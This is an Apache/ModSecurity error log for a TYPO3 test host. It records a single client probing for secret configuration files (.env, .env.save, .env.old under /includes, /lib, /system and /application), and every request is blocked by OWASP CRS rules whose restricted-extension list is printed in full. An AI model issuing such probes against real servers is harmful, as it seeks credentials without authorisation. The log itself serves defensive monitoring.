[Fri Nov 21 10:13:04.660893 2025] [:error] [pid 224149] [client 15.223.224.122:51068] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSAtIMsPY-oBfuAti3FYxAAAAAU"]
[Fri Nov 21 10:13:04.661109 2025] [:error] [pid 224149] [client 15.223.224.122:51068] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSAtIMsPY-oBfuAti3FYxAAAAAU"]
[Fri Nov 21 10:13:04.661282 2025] [:error] [pid 224149] [client 15.223.224.122:51068] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSAtIMsPY-oBfuAti3FYxAAAAAU"]
[Fri Nov 21 10:13:04.666894 2025] [authz_core:error] [pid 223953] [client 15.223.224.122:51024] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/includes
[Fri Nov 21 10:13:04.888492 2025] [:error] [pid 223955] [client 15.223.224.122:51310] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSAtIDEUbh-dzxMTkK_x6QAAAAM"]
[Fri Nov 21 10:13:04.888720 2025] [:error] [pid 223955] [client 15.223.224.122:51310] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSAtIDEUbh-dzxMTkK_x6QAAAAM"]
[Fri Nov 21 10:13:04.888906 2025] [:error] [pid 223955] [client 15.223.224.122:51310] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSAtIDEUbh-dzxMTkK_x6QAAAAM"]
[Fri Nov 21 10:13:04.953500 2025] [:error] [pid 224162] [client 15.223.224.122:51328] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSAtIE_9oHP6AInZ0COzLAAAAAo"]
[Fri Nov 21 10:13:04.953661 2025] [:error] [pid 224162] [client 15.223.224.122:51328] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSAtIE_9oHP6AInZ0COzLAAAAAo"]
[Fri Nov 21 10:13:04.953861 2025] [:error] [pid 224162] [client 15.223.224.122:51328] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSAtIE_9oHP6AInZ0COzLAAAAAo"]
[Fri Nov 21 10:13:04.954040 2025] [:error] [pid 224162] [client 15.223.224.122:51328] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSAtIE_9oHP6AInZ0COzLAAAAAo"]
[Fri Nov 21 10:13:08.181852 2025] [:error] [pid 229739] [client 15.223.224.122:53066] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSAtJMbkBXbqKl45swqCDQAAAAc"]
[Fri Nov 21 10:13:08.183277 2025] [:error] [pid 224164] [client 15.223.224.122:53058] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSAtJHwkd7Eed7ZXqoT4fgAAAAw"]
[Fri Nov 21 10:13:08.183457 2025] [:error] [pid 224164] [client 15.223.224.122:53058] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSAtJHwkd7Eed7ZXqoT4fgAAAAw"]
[Fri Nov 21 10:13:08.183620 2025] [:error] [pid 224164] [client 15.223.224.122:53058] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aSAtJHwkd7Eed7ZXqoT4fgAAAAw"]
[Fri Nov 21 10:13:08.183957 2025] [:error] [pid 229739] [client 15.223.224.122:53066] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSAtJMbkBXbqKl45swqCDQAAAAc"]
[Fri Nov 21 10:13:08.184097 2025] [:error] [pid 229739] [client 15.223.224.122:53066] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aSAtJMbkBXbqKl45swqCDQAAAAc"]
[Fri Nov 21 10:13:08.249938 2025] [authz_core:error] [pid 223952] [client 15.223.224.122:53096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/lib
[Fri Nov 21 10:13:08.283742 2025] [authz_core:error] [pid 224149] [client 15.223.224.122:53148] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application
[Fri Nov 21 10:13:08.286646 2025] [:error] [pid 224163] [client 15.223.224.122:53090] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSAtJI-vpBn5AqkyjcS1GgAAAAs"]
[Fri Nov 21 10:13:08.286815 2025] [:error] [pid 224163] [client 15.223.224.122:53090] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSAtJI-vpBn5AqkyjcS1GgAAAAs"]
[Fri Nov 21 10:13:08.286938 2025] [:error] [pid 229737] [client 15.223.224.122:53124] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSAtJOSNO7cObITHQGDnrAAAAAQ"]
[Fri Nov 21 10:13:08.287012 2025] [:error] [pid 224163] [client 15.223.224.122:53090] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSAtJI-vpBn5AqkyjcS1GgAAAAs"]
[Fri Nov 21 10:13:08.287113 2025] [:error] [pid 229737] [client 15.223.224.122:53124] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSAtJOSNO7cObITHQGDnrAAAAAQ"]
[Fri Nov 21 10:13:08.287163 2025] [:error] [pid 224163] [client 15.223.224.122:53090] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aSAtJI-vpBn5AqkyjcS1GgAAAAs"]
[Fri Nov 21 10:13:08.287283 2025] [:error] [pid 229737] [client 15.223.224.122:53124] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aSAtJOSNO7cObITHQGDnrAAAAAQ"]
[Fri Nov 21 10:13:08.291321 2025] [:error] [pid 223954] [client 15.223.224.122:53152] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSAtJIPLQdWysfkg-aEKBAAAAAI"]
[Fri Nov 21 10:13:08.291467 2025] [:error] [pid 223954] [client 15.223.224.122:53152] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSAtJIPLQdWysfkg-aEKBAAAAAI"]
[Fri Nov 21 10:13:08.291612 2025] [:error] [pid 223954] [client 15.223.224.122:53152] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSAtJIPLQdWysfkg-aEKBAAAAAI"]
[Fri Nov 21 10:13:08.291762 2025] [:error] [pid 223954] [client 15.223.224.122:53152] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aSAtJIPLQdWysfkg-aEKBAAAAAI"]
[Fri Nov 21 10:13:08.403224 2025] [:error] [pid 223953] [client 15.223.224.122:53204] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSAtJD27u3u2us0kkkbyAgAAAAE"]
[Fri Nov 21 10:13:08.403452 2025] [:error] [pid 223953] [client 15.223.224.122:53204] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSAtJD27u3u2us0kkkbyAgAAAAE"]
[Fri Nov 21 10:13:08.403617 2025] [:error] [pid 223953] [client 15.223.224.122:53204] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSAtJD27u3u2us0kkkbyAgAAAAE"]
[Fri Nov 21 10:13:08.476929 2025] [:error] [pid 223955] [client 15.223.224.122:53162] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSAtJDEUbh-dzxMTkK_x6gAAAAM"]
[Fri Nov 21 10:13:08.477143 2025] [:error] [pid 223955] [client 15.223.224.122:53162] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSAtJDEUbh-dzxMTkK_x6gAAAAM"]
[Fri Nov 21 10:13:08.477322 2025] [:error] [pid 223955] [client 15.223.224.122:53162] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSAtJDEUbh-dzxMTkK_x6gAAAAM"]
[Fri Nov 21 10:13:08.697593 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:53446] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/system
[Fri Nov 21 10:13:08.720789 2025] [:error] [pid 229744] [client 15.223.224.122:53426] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSAtJIml-svsT9-_8bDeEwAAAAY"]
[Fri Nov 21 10:13:08.720983 2025] [:error] [pid 229744] [client 15.223.224.122:53426] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSAtJIml-svsT9-_8bDeEwAAAAY"]
[Fri Nov 21 10:13:08.721553 2025] [:error] [pid 229744] [client 15.223.224.122:53426] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSAtJIml-svsT9-_8bDeEwAAAAY"]
